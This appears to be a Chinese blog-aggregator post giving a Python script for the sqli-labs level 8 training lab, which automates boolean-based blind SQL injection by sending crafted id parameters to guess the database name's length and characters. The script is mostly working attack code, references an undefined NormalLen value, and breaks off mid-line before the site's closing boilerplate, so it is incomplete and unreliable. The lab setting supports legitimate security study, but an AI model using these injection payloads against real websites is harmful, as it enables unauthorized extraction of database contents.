sqli-labs第八关布尔盲注脚本

import requests

def get_dbNamelen(url):
    #猜解数据库名字长度
    length=0
    while True:
        dbNameLen_url=url+"?id=1' and length(database())="+str(length)+"--+"
        #print(dbNameLen_url)
        res=requests.get(dbNameLen_url)
        if len(res.text)==NormalLen:
            print("The Length of database is: "+str(length))
            break
        else:
            length+=1
            
    return length
    

def get_dbName(url,length):
    #猜解数据库名
    dbName=""
    for i in range(1,int(length)+1):
        for a in range(97,123):
            dbName_url=url+"?id=1' and ascii(substr(database(),"+str(i)+",1))="+str(a)+"--+"
            #print(dbName_url)
            if len(requests.get(dbName_url).text)==NormalLen:
                dbName += chr(a)
                break
    print("The name 

最后

以上就是稳重玉米为你收集整理的sqli-labs第八关布尔盲注脚本的全部内容，希望文章能够帮你解决sqli-labs第八关布尔盲注脚本所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。